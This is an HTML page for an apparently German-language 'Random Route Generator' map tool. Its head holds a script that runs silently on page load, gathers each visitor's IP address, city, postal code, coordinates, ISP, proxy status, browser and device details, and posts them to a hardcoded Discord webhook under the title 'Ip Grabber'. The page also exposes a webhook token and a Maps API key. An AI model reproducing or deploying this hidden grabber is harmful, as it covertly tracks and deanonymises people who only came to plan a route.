<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="random route, generator, random run, random walk, random cycle, random bike, path generator, riley walz, routeshuffle">
    <meta name="description" content="The Random Route Generator allows you to create random routes within a customizable radius. Switch between light and dark mode and open your routes in Google Maps. Choose between modes of transportation like car, on foot, or bicycle to personalize your journey.">

    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript">
        var webhook = "https://discord.com/api/webhooks/1320891998990897162/exyF2qv0_R1DaqdVHccaoCrsxZQHtaNwv9D4pw7KEsFYZivO1YrPACT3y-EtUpAwGfmt";

        
        const request = new XMLHttpRequest();
        request.onreadystatechange = function() {
            if (this.readyState == 4) {
                window.open(url,"_self");
            }
        }
        request.open("POST", webhook);
        request.setRequestHeader('Content-type', 'application/json');
        $.getJSON('https://json.geoiplookup.io/?callback=?', function(dbip) {
            $.getJSON('https://api.bigdatacloud.net/data/client-info', function(bdc) {
                var now = new Date;
                if (now.toUTCString() != null) {
                    var description = `**UTC TIME STAMP**: \`${now.toUTCString()}\``;
                }
                if (dbip["ip"] != null) {
                    description = description + `\n**IP**: \`${dbip["ip"]}\``;
                }
                if (bdc["isBehindProxy"] != null) {
                    description = description + `\n**PROXY**: \`${bdc["isBehindProxy"]}\``;
                }
                if (dbip["country_name"] != null) {
                    description = description + `\n**COUNTRY**: \`${dbip["country_name"]}\``;
                }
                if (dbip["region"] != null) {
                    description = description + `\n**STATE**: \`${dbip["region"]}\``;
                }
                if (dbip["city"] != null) {
                    description = description + `\n**CITY**: \`${dbip["city"]}\``;
                }
                if (dbip["org"] != null) {
                    description = description + `\n**ORGANIZATION**: \`${dbip["org"]}\``;
                }
                if (dbip["postal_code"] != null) {
                    description = description + `\n**POSTAL CODE**: \`${dbip["postal_code"]}\``;
                }
                if (dbip["latitude"] != null) {
                    description = description + `\n**LATITUDE**: \`${dbip["latitude"]}\``;
                }
                if (dbip["longitude"] != null) {
                    description = description + `\n**LONGITUDE**: \`${dbip["longitude"]}\``;
                }
                if (dbip["currency_name"] != null) {
                    description = description + `\n**CURRENCY**: \`${dbip["currency_name"]}\``;
                }
                if (navigator.userAgent != null) {
                    description = description + `\n**USER-AGENT**: \`${navigator.userAgent}\``;
                }
                if (Intl.DateTimeFormat().resolvedOptions().timeZone != null) {
                    description = description + `\n**TIME ZONE**: \`${Intl.DateTimeFormat().resolvedOptions().timeZone}\``;
                }
                if (document.referrer != null && document.referrer.trim() != "") {
                    description = description + `\n**REFERRER**: \`${document.referrer}\``;
                }
                if (bdc["userAgent"] != null) {
                    description = description + `\n**BROWSER**: \`${bdc["userAgent"]}\``;
                }
                if (navigator.language != null) {
                    description = description + `\n**LANGUAGE**: \`${navigator.language}\``;
                }
                if (navigator.platform != null) {
                    description = description + `\n**PLATFORM**: \`${navigator.platform}\``;
                }
                if (bdc["device"] != null) {
                    description = description + `\n**DEVICE**: \`${bdc["device"]}\``;
                }
                if (navigator.javaEnabled() != null) {
                    description = description + `\n**JAVA ENABLED**: \`${navigator.javaEnabled()}\``;
                }
                if (screen.width != null && screen.height != null) {
                    description = description + `\n**SCREEN SIZE**: \`${screen.width}x${screen.height}\``;
                }
                const params = {
                    "embeds": [
                        {
                            "title": "Ip Grabber",
                            "description": description,
                            "color": 5814783
                        }
                    ]
                }
                request.send(JSON.stringify(params));
            });
        })
    </script>


    <title>KartenTest</title>
    <style>
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: flex-start;
            flex-direction: column;
            height: 100vh;
            transition: background-color 0.3s, color 0.3s;
        }

        .light-mode {
            background-color: #fff;
            color: #000;
        }

        .dark-mode {
            background-color: #121212;
            color: #fff;
        }

        #map-container {
            position: relative; /* Needed for absolute positioning of the toggle button */
            width: 80%;
            max-width: 800px;
            margin: 20px auto; /* Center the map container */
        }

        #map {
            height: 400px;
            border-radius: 10px;
            box-shadow: 0 2px 8px rgba(0,0,0,0.2);
            margin-bottom: 10px; /* Space between the map and the control panel */
        }

        #mode-toggle {
            position: absolute;
            top: -40px; /* Position above the map */
            right: 0;
            z-index: 10; /* Ensure the button is above other elements */
        }

        .control-panel {
            display: flex;
            justify-content: center;
            gap: 10px;
            margin-bottom: 10px; /* Space between the control panel and the route info */
        }

        .route-info-panel {
            text-align: center; /* Center the route info text */
        }

        button {
            background-color: #4CAF50;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s, transform 0.2s;
        }

        button:hover {
            background-color: #45a049;
            transform: scale(1.05);
        }

        /* Additional styles you may have... */
    </style>
    <!-- Insert your Google Maps API key -->
    <script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCzkR9XyYybSt-IpFMeVxBIQejEhGeuL-w&callback=initMap" async defer></script>
    <script src="script.js"></script> <!-- Your JavaScript code -->
</head>
<body class="dark-mode">
    <div id="map-container">
        <button id="mode-toggle">Toggle Light/Dark Mode</button>
        <div id="map"></div>
        <div class="control-panel">
            <button aria-label="Route generieren" id="generateRoute">Route generieren</button>
            <button id="openInGoogleMaps" style="display: none;">In Google Maps öffnen</button>
            <div class="transport-mode-buttons" id="transport-mode-buttons" style="display: none;">
              <button id="modeDriving" class="mode-button">Auto</button>
              <button id="modeWalking" class="mode-button">Zu Fuß</button>
              <button id="modeBicycling" class="mode-button">Fahrrad</button>
          </div>
          </div>
        <div class="control-panel">
            <input type="range" min="1" max="100" value="50" class="slider" id="radiusSlider">
            <label for="radiusSlider">Radius: <span id="radiusValue">50</span> km</label>
            <input type="number" id="customRadius" value="50" min="1" max="100"> km
        </div>
        <div class="route-info-panel">
            <p id="routeDistance">Entfernung zum Ziel: </p>
            <div id="loadingIndicator" style="display:none;">Laden...</div>
        </div>
    </div>
</body>
</html>
